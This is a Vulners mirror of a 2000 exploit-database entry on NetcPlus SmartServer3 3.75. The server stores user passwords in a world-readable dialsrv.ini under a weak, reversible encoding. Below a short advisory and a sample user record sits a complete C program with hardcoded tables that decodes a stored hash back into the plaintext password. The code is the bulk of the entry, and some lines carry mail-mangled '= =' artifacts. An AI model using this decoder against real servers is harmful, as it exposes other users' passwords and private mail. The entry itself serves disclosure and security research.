Vulners
Lucene search
NetcPlus SmartServer3 3.75 - Weak Encryption
/*
source: https://www.securityfocus.com/bid/1962/info
SmartServer3 is an email server designed for small networks.
A design error exists in SmartServer3 which enables an authenticated user to view other users login information and possibly gain access to passwords. SmartServer3 by default intsalls in the C:\ProgramFiles\smartserver3/ directory and includes a configuration file called dialsrv.ini. This file is accessible by all Windows authenticated users and contains detailed user login information including the encrypted password. However SmartServer3 uses a weak encryption scheme which can easily be broken using a third party utility.
Successful exploitation yields unauthorized access to private data.
The following example of user login information found in the dialsrv.ini file is provided by Steven Alexander <[email protected]>:
[USER1]
realname=Carl Jones
id=Carl
dir=CARL
pw=~:kC@nD3~:
extml=0
alertport=
alert=
UserActive=1
MailLimit=0
MailMAxWarn=0
MailMaxSize=20
*/
#include <stdio.h>
#define DIGIT 0
#define UPPER 1
#define LOWER 2
#define DEFAULT 3
void main() {
unsigned char start_table[4][8] = {
{ 0x30, 0x4a, 0x7b, 0x53, 0x50, 0x7e, 0x54, 0x43 },
{ 0x41, 0x5b, 0x2e, 0x64, 0x61, 0x31, 0x65, 0x54 },
{ 0x60, 0x7a, 0x4d, 0x25, 0x22, 0x50, 0x26, 0x73 },
{ 0x7e, 0x3a, 0x6b, 0x43, 0x40, 0x6e, 0x44, 0x33} };
unsigned char uname = 0x46; /* Just the first character from DIR= =
entry */
unsigned char hash[8] = { 'E', '1', 'U', '0', 't', 'b', '*', '&' } ;
unsigned char pass[8];
unsigned char i;
unsigned char range;
if(uname >= 0x30 && uname <=39) {
for(i=0;i<=7;i++) {
hash[i]+=1; }
}
for(i=0;i<8;i++) {
if(hash[i] == start_table[DEFAULT][i]) {
pass[i] = uname;
continue; }
range=LOWER; /* hash values wrap to 0x21 after 0x7e */
if(hash[i] >= start_table[DIGIT][i] && hash[i] <= =
(start_table[DIGIT][i] + 0x0a))
range = DIGIT;
if(hash[i] >= start_table[UPPER][i] && hash[i] <= =
(start_table[UPPER][i] + 0x1a))
range=UPPER;
if(hash[i] >= start_table[LOWER][i] && hash[i] <= =
(start_table[LOWER][i] + 0x1a))
range=LOWER;
if(range==DIGIT) {
if(i==2 || i==5) {
if(hash[i] < 0x73) {
hash[i] = hash[i] + 0x5e; } }
pass[i] = ( hash[i] - start_table[DIGIT][i] ) + 0x30; }
if(range==UPPER) {
pass[i] = ( hash[i] - start_table[UPPER][i] ) + 0x41;
if(pass[i] >= uname)
pass[i]+=1; }
if(range==LOWER) {
if(i==1 || i ==7) {
if(hash[i] < 0x73) {
hash[i] = hash[i] + 0x5e; } }
pass[i] = ( hash[i] - start_table[LOWER][i] ) + 0x61; }
}
printf("The password is:\n\t");
for(i=0;i<8;i++) {
printf("%c ", pass[i]);
}
printf("\n");
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Nov 2000 00:00Current
7.4High risk
Vulners AI Score7.4